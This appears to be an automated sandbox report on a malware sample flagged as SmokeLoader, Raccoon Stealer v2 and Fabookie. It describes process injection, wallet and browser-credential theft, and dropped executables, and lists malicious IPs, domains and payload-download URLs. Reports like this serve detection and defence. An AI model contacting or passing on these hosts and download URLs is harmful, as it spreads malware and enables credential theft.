Source: C:\Users\user\AppData\Local\Temp\D8D3.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior

Remote Access Functionality
barindex
Yara detected SmokeLoader
Source: Yara match File source: 00000000.00000002.313394418.0000000000851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.313299344.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.443874552.00000000007E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.444700260.00000000021E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Yara detected Raccoon Stealer v2
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: D8D3.exe PID: 5128, type: MEMORYSTR
Yara detected Fabookie
Source: Yara match File source: Process Memory Space: llpb1133.exe PID: 2560, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 800784 Sample: file.exe Startdate: 07/02/2023 Architecture: WINDOWS Score: 100 86 api.2ip.ua 2->86 116 Multi AV Scanner detection for domain / URL 2->116 118 Malicious sample detected (through community Yara rule) 2->118 120 Antivirus detection for URL or domain 2->120 122 12 other signatures 2->122 11 file.exe 2->11         started        14 sievwvt 2->14         started        16 3046.exe 2->16         started        signatures3 process4 signatures5 160 Detected unpacking (changes PE section rights) 11->160 162 Maps a DLL or memory area into another process 11->162 164 Checks if the current machine is a virtual machine (disk enumeration) 11->164 166 Creates a thread in another existing process (thread injection) 11->166 18 explorer.exe 12 29 11->18 injected 168 Multi AV Scanner detection for dropped file 14->168 170 Machine Learning detection for dropped file 14->170 process6 dnsIp7 88 flytourchip.com.br 158.69.96.67 OVHFR Canada 18->88 90 23.106.124.133 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG Singapore 18->90 92 5 other IPs or domains 18->92 62 C:\Users\user\AppData\Roaming\sievwvt, PE32 18->62 dropped 64 C:\Users\user\AppData\Roaming\jhevwvt, PE32 18->64 dropped 66 C:\Users\user\AppData\Local\Temp\FB61.exe, PE32 18->66 dropped 68 9 other malicious files 18->68 dropped 124 System process connects to network (likely due to code injection or exploit) 18->124 126 Benign windows process drops PE files 18->126 128 Deletes itself after installation 18->128 130 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->130 23 A33B.exe 5 18->23         started        27 3046.exe 18->27         started        29 D8D3.exe 23 18->29         started        32 6 other processes 18->32 file8 signatures9 process10 dnsIp11 70 C:\Users\user\AppData\Local\Temp\pliu.exe, PE32 23->70 dropped 72 C:\Users\user\AppData\Local\...\llpb1133.exe, PE32+ 23->72 dropped 74 C:\Users\user\AppData\Local\...\XandETC.exe, PE32+ 23->74 dropped 136 Antivirus detection for dropped file 23->136 138 Machine Learning detection for dropped file 23->138 34 llpb1133.exe 23->34         started        37 pliu.exe 23->37         started        39 XandETC.exe 23->39         started        140 Multi AV Scanner detection for dropped file 27->140 142 Detected unpacking (changes PE section rights) 27->142 144 Detected unpacking (overwrites its own PE header) 27->144 146 Injects a PE file into a foreign processes 27->146 41 3046.exe 1 15 27->41         started        96 62.204.41.134 TNNET-ASTNNetOyMainnetworkFI United Kingdom 29->96 76 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 29->76 dropped 78 C:\Users\user\AppData\LocalLow\softokn3.dll, PE32 29->78 dropped 80 C:\Users\user\AppData\LocalLow\nss3.dll, PE32 29->80 dropped 82 4 other files (2 malicious) 29->82 dropped 148 Tries to harvest and steal browser information (history, passwords, etc) 29->148 150 Tries to steal Crypto Currency Wallets 29->150 98 star-mini.c10r.facebook.com 157.240.253.35 FACEBOOKUS United States 32->98 100 iueg.aappatey.com 45.66.159.142 ENZUINC-US Russian Federation 32->100 102 2 other IPs or domains 32->102 152 Maps a DLL or memory area into another process 32->152 154 Sample uses process hollowing technique 32->154 156 Tries to detect virtualization through RDTSC time measurements 32->156 158 2 other signatures 32->158 45 WerFault.exe 32->45         started        file12 signatures13 process14 dnsIp15 106 Antivirus detection for dropped file 34->106 108 Multi AV Scanner detection for dropped file 34->108 110 Machine Learning detection for dropped file 34->110 114 2 other signatures 34->114 112 Creates processes via WMI 37->112 47 pliu.exe 37->47         started        51 conhost.exe 37->51         started        94 api.2ip.ua 162.0.217.254 ACPCA Canada 41->94 84 C:\Users\user\AppData\Local\...\3046.exe, PE32 41->84 dropped 53 3046.exe 41->53         started        56 icacls.exe 41->56         started        file16 signatures17 process18 dnsIp19 104 xv.yxzgamen.com 188.114.97.3 CLOUDFLARENETUS European Union 47->104 60 C:\Users\user\AppData\Local\Temp\db.dll, PE32 47->60 dropped 58 conhost.exe 47->58         started        132 Sample uses process hollowing technique 53->132 134 Injects a PE file into a foreign processes 53->134 file20 signatures21 process22
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
37.34.248.24
 unknown Kuwait
42961 GPRS-ASZAINKW true
190.219.54.242
 unknown Panama
18809 CableOndaPA true
23.106.124.133
 unknown Singapore
59253 LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSG true
45.66.159.142
 siaoheg.aappatey.com Russian Federation
18978 ENZUINC-US false
62.204.41.134
 unknown United Kingdom
30798 TNNET-ASTNNetOyMainnetworkFI false
195.158.3.162
 perficut.at Uzbekistan
8193 BRM-ASUZ true
188.114.97.3
 xv.yxzgamen.com European Union
13335 CLOUDFLARENETUS false
158.69.96.67
 flytourchip.com.br Canada
16276 OVHFR true
188.114.96.3
 potunulit.org European Union
13335 CLOUDFLARENETUS true
77.73.134.27
 unknown Kazakhstan
206751 FIBEROPTIXDE true
162.0.217.254
 api.2ip.ua Canada
35893 ACPCA false
157.240.253.35
 star-mini.c10r.facebook.com United States
32934 FACEBOOKUS false

Contacted Domains

Name IP Active
star-mini.c10r.facebook.com 157.240.253.35 true
perficut.at 195.158.3.162 true
potunulit.org 188.114.96.3 true
siaoheg.aappatey.com 45.66.159.142 true
api.2ip.ua 162.0.217.254 true
flytourchip.com.br 158.69.96.67 true
xv.yxzgamen.com 188.114.97.3 true
iueg.aappatey.com 45.66.159.142 true
www.facebook.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://flytourchip.com.br/systems/ChromeSetup.exe true
  • Avira URL Cloud: safe
 unknown
http://perficut.at/tmp/ true
  • Avira URL Cloud: safe
 unknown
http://potunulit.org/ true
  • URL Reputation: safe
 unknown
https://www.facebook.com/login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing false
    		high
    http://soryytlic4.net/ true
    • URL Reputation: safe
    		 unknown
    http://novanosa5org.org/ true
    • URL Reputation: safe
    		 unknown
    http://golilopaster.org/ true
    • URL Reputation: safe
    		 unknown
    http://bihsy.com/lancer/get.php true
    • Avira URL Cloud: malware
    		 unknown
    http://62.204.41.134/ false
    • Avira URL Cloud: safe
    		 unknown
    https://xv.yxzgamen.com/2701.html true
    • URL Reputation: malware
    		 unknown
    http://62.204.41.134/2bdc6e9a1ce82117657287e1bc36e604 false
    • Avira URL Cloud: safe
    		 unknown
    http://bulimu55t.net/ true
    • URL Reputation: safe
    		 unknown
    https://xv.yxzgamen.com/logo.png true
    • URL Reputation: malware
    		 unknown
    https://api.2ip.ua/geo.json false
      		high
      http://siaoheg.aappatey.com/check/?sid=286587&key=075ea35c9751668450c9ec4c0067c0f6 false
      • Avira URL Cloud: safe
      		 unknown
      http://iueg.aappatey.com/check/safe false
      • URL Reputation: safe
      		 unknown
      http://hujukui3.net/ true
      • URL Reputation: safe
      		 unknown
      https://www.facebook.com/ads/manager/account_settings/account_billing false
        		high
        http://77.73.134.27/llpb1133.exe true
        • URL Reputation: malware
        		 unknown
        http://bukubuka1.net/ true
        • URL Reputation: safe
        		 unknown
        http://newzelannd66.org/ true
        • URL Reputation: safe
        		 unknown